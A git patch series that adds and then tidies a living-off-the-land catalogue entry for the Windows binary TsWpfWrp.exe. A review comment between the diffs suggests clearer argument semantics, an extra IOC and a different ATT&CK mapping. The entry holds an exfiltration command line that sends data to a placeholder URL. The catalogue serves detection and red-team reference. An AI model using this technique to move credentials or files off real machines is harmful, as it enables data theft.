From 20ea9d337915cefe8f7191695f4214794e1578d8 Mon Sep 17 00:00:00 2001
From: Avihay Eldad <46644022+avihayeldad@users.noreply.github.com>
Date: Thu, 25 Apr 2024 14:05:30 +0300
Subject: [PATCH 1/2] Add files via upload

---
 yml/OSBinaries/TsWpfWrp.yml | 24 ++++++++++++++++++++++++
 1 file changed, 24 insertions(+)
 create mode 100644 yml/OSBinaries/TsWpfWrp.yml

diff --git a/yml/OSBinaries/TsWpfWrp.yml b/yml/OSBinaries/TsWpfWrp.yml
new file mode 100644
index 00000000..a6786b58
--- /dev/null
+++ b/yml/OSBinaries/TsWpfWrp.yml
@@ -0,0 +1,24 @@
+---
+Name: TsWpfWrp.exe
+Description: Windows Presentation Foundation Terminal Server Print Wrapper
+Author: Avihay Eldad
+Created: 2024-04-25
+Commands:
+ - Command: TsWpfWrp.exe http://example.com/ExfilData blabla
+ Description: Upload file, credentials or data exfiltration in general
+ Usecase: Exfilitrate data to remote server
+ Category: Upload
+ Privileges: User
+ MitreID: T1567
+ OperatingSystem: Windows
+Full_Path:
+ - Path: C:\Windows\System32\TsWpfWrp.exe
+ - Path: C:\Windows\SysWOW64\TsWpfWrp.exe
+Detection:
+ - IOC: TsWpfWrp making unexpected network connections or DNS requests
+Acknowledgement:
+ - Person: Avihay Eldad
+ Handle: '@AvihayEldad'
+ - Person: Sagi Dinar
+ Handle: '@DinarSagi'
+ 
\ No newline at end of file

From 774dd7e0e0e86f43315d6e34d7000853c522a65e Mon Sep 17 00:00:00 2001
From: Avihay Eldad <46644022+avihayeldad@users.noreply.github.com>
Date: Thu, 25 Apr 2024 14:16:14 +0300
Subject: [PATCH 2/2] Update TsWpfWrp.yml

---
 yml/OSBinaries/TsWpfWrp.yml | 5 ++---
 1 file changed, 2 insertions(+), 3 deletions(-)

diff --git a/yml/OSBinaries/TsWpfWrp.yml b/yml/OSBinaries/TsWpfWrp.yml
index a6786b58..bfad442f 100644
--- a/yml/OSBinaries/TsWpfWrp.yml
+++ b/yml/OSBinaries/TsWpfWrp.yml
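Review bot: The new Command line `TsWpfWrp.exe http://example.com/ExfilData blabla` does not say what the second argument is or what the binary actually transmits to the URL, so neither a red teamer nor a detection engineer can reproduce or scope the technique from the Description alone; the Description should spell out the argument semantics, for example `Description: Sends the file given as the second argument to the URL in the first argument over HTTP`, if that is the confirmed behavior. The single IOC `TsWpfWrp making unexpected network connections or DNS requests` is hard to operationalize without a process-creation indicator; since the URL appears in the command line of the documented usage, consider adding `- IOC: TsWpfWrp.exe started with a URL on its command line`. T1567 (Exfiltration Over Web Service) presumes a legitimate third-party web service, whereas the example targets an arbitrary attacker-controlled HTTP endpoint, for which T1048.003 may be the closer mapping — worth confirming against the binary's actual transport before publishing.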
@@ -5,8 +5,8 @@ Author: Avihay Eldad
 Created: 2024-04-25
 Commands:
 - Command: TsWpfWrp.exe http://example.com/ExfilData blabla
- Description: Upload file, credentials or data exfiltration in general
- Usecase: Exfilitrate data to remote server
+ Description: Upload file, credentials, or data exfiltration in general
+ Usecase: Exfiltrate data to a remote server
 Category: Upload
 Privileges: User
 MitreID: T1567
@@ -21,4 +21,3 @@ Acknowledgement:
 Handle: '@AvihayEldad'
 - Person: Sagi Dinar
 Handle: '@DinarSagi'
- 
\ No newline at end of file